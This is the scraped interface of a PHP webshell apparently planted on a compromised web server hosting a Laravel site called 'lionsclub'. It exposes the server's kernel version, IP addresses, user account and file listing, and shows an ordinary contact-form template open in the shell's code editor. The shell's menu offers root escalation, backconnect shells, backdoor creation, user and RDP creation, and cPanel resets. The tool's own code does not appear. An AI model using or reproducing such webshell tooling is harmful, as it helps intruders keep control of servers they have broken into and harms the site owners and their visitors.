Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.142.171.201
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lionsclub /
core /
resources /
views /
frontEnd /
[ HOME SHELL ]
Name
Size
Permission
Action
includes
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
contact.blade.php
8.1
KB
-rw-r--r--
contactus.blade.php
3.56
KB
-rw-r--r--
home.blade.php
23.52
KB
-rw-r--r--
layout.blade.php
2.57
KB
-rw-r--r--
mail.blade.php
15.09
KB
-rw-r--r--
sitemap.blade.php
365
B
-rw-r--r--
table.blade.php
22.7
KB
-rw-r--r--
topic.blade.php
60.05
KB
-rw-r--r--
topics.blade.php
34.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.blade.php
@extends('frontEnd.layout') @section('content') <section id="inner-headline"> <div class="container"> <div class="row"> <div class="col-lg-12"> <ul class="breadcrumb"> <li><a href="{{ route('Home') }}"><i class="fa fa-home"></i></a><i class="icon-angle-right"></i> </li> <li class="active">{{ $title }}</li> </ul> </div> </div> </div> acontact </section> @endsection @section('footerInclude') <?php $map_title_var = "title_" . @Helper::currentLanguage()->code; $map_details_var = "details_" . @Helper::currentLanguage()->code; ?> <script type="text/javascript" src="//maps.google.com/maps/api/js?key={{ env("GOOGLE_MAPS_KEY") }}"></script> <script type="text/javascript"> // var iconURLPrefix = 'http://maps.google.com/mapfiles/ms/icons/'; var iconURLPrefix = "{{ asset('assets/dashboard/images/')."/" }}"; var icons = [ iconURLPrefix + 'marker_0.png', iconURLPrefix + 'marker_1.png', iconURLPrefix + 'marker_2.png', iconURLPrefix + 'marker_3.png', iconURLPrefix + 'marker_4.png', iconURLPrefix + 'marker_5.png', iconURLPrefix + 'marker_6.png' ] var locations = [ @foreach($Topic->maps as $map) ['<?php echo "<strong>" . $map->$map_title_var . "</strong>" . "<br>" . $map->$map_details_var; ?>', <?php echo $map->longitude; ?>, <?php echo $map->latitude; ?>, <?php echo $map->id; ?>, <?php echo $map->icon; ?>], @endforeach ]; var map = new google.maps.Map(document.getElementById('google-map'), { zoom: 6, draggable: false, scrollwheel: false, center: new google.maps.LatLng(<?php echo $MapCenter; ?>), mapTypeId: google.maps.MapTypeId.ROADMAP }); var infowindow = new google.maps.InfoWindow(); var marker, i; for (i = 0; i < locations.length; i++) { marker = new google.maps.Marker({ position: new google.maps.LatLng(locations[i][1], locations[i][2]), icon: icons[locations[i][4]], map: map }); google.maps.event.addListener(marker, 'click', (function (marker, i) { return function () { infowindow.setContent(locations[i][0]); infowindow.open(map, marker); } })(marker, i)); } </script> @endif <script type="text/javascript"> jQuery(document).ready(function ($) { "use strict"; //Contact $('form.contactForm').submit(function () { var f = $(this).find('.form-group'), ferror = false, emailExp = /^[^\s()<>@,;:\/]+@\w[\w\.-]+\.[a-z]{2,}$/i; f.children('input').each(function () { // run all inputs var i = $(this); // current input var rule = i.attr('data-rule'); if (rule !== undefined) { var ierror = false; // error flag for current input var pos = rule.indexOf(':', 0); if (pos >= 0) { var exp = rule.substr(pos + 1, rule.length); rule = rule.substr(0, pos); } else { rule = rule.substr(pos + 1, rule.length); } switch (rule) { case 'required': if (i.val() === '') { ferror = ierror = true; } break; case 'minlen': if (i.val().length < parseInt(exp)) { ferror = ierror = true; } break; case 'email': if (!emailExp.test(i.val())) { ferror = ierror = true; } break; case 'checked': if (!i.attr('checked')) { ferror = ierror = true; } break; case 'regexp': exp = new RegExp(exp); if (!exp.test(i.val())) { ferror = ierror = true; } break; } i.next('.validation').html('<i class=\"fa fa-info\"></i> ' + (ierror ? (i.attr('data-msg') !== undefined ? i.attr('data-msg') : 'wrong Input') : '')).show(); !ierror ? i.next('.validation').hide() : i.next('.validation').show(); } }); f.children('textarea').each(function () { // run all inputs var i = $(this); // current input var rule = i.attr('data-rule'); if (rule !== undefined) { var ierror = false; // error flag for current input var pos = rule.indexOf(':', 0); if (pos >= 0) { var exp = rule.substr(pos + 1, rule.length); rule = rule.substr(0, pos); } else { rule = rule.substr(pos + 1, rule.length); } switch (rule) { case 'required': if (i.val() === '') { ferror = ierror = true; } break; case 'minlen': if (i.val().length < parseInt(exp)) { ferror = ierror = true; } break; } i.next('.validation').html('<i class=\"fa fa-info\"></i> ' + (ierror ? (i.attr('data-msg') != undefined ? i.attr('data-msg') : 'wrong Input') : '')).show(); !ierror ? i.next('.validation').hide() : i.next('.validation').show(); } }); if (ferror) return false; else var str = $(this).serialize(); var xhr = $.ajax({ type: "POST", url: "{{ route("contactPageSubmit") }}", data: str, success: function (msg) { if (msg == 'OK') { $("#sendmessage").addClass("show"); $("#errormessage").removeClass("show"); $("#name").val(''); $("#email").val(''); $("#phone").val(''); $("#subject").val(''); $("#message").val(''); $(window).scrollTop($('#contact_div').offset().top); } else { $("#sendmessage").removeClass("show"); $("#errormessage").addClass("show"); $('#errormessage').html(msg); } } }); //console.log(xhr); return false; }); }); </script> @endsection
Close